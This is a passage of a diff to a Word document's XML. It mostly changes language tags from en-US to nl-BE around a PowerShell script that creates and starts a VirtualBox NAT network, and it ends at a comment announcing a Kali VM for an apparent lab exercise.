+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
-        <w:t>} else {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+        <w:t xml:space="preserve">} </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>else</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:tab/>
@@ -4798,25 +6577,107 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
-        <w:t># If it doesn't exist, print a message</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>If</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>doesn't</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, print a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>message</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -4824,17 +6685,35 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
-        <w:t>Write-Output "NAT network '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+        <w:t xml:space="preserve">Write-Output "NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -4843,24 +6722,60 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' does not exist."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' does </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>not</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
         <w:t>}</w:t>
@@ -4871,49 +6786,167 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add NAT network with desired settings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Write-Output "Creating NAT network '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>desired</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>settings</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Write-Output "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Creating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -4922,7 +6955,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'."</w:t>
       </w:r>
@@ -4932,15 +6965,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -4949,7 +6982,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -4958,7 +6991,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
       </w:r>
@@ -4967,16 +7000,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> add --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>netname</w:t>
       </w:r>
@@ -4985,7 +7036,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
       </w:r>
@@ -4994,7 +7045,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -5003,16 +7054,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --network "192.168.0.0/24" --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "192.168.0.0/24" --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>dhcp</w:t>
       </w:r>
@@ -5021,59 +7090,115 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on --ipv6 off --enable</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Start NAT network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Write-Output "Starting NAT network '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on --ipv6 off --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>enable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Start NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Write-Output "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Starting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -5082,7 +7207,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'."</w:t>
       </w:r>
@@ -5092,15 +7217,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -5109,7 +7234,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5118,7 +7243,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
       </w:r>
@@ -5127,7 +7252,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> start --</w:t>
       </w:r>
@@ -5136,7 +7261,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>netname</w:t>
       </w:r>
@@ -5145,7 +7270,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
       </w:r>
@@ -5154,7 +7279,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -5165,23 +7290,23 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Start-Sleep 10</w:t>
       </w:r>
@@ -5191,23 +7316,23 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -5217,31 +7342,67 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># 2. Create Kali VM for attack | +- 2min</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># 2. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Create</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
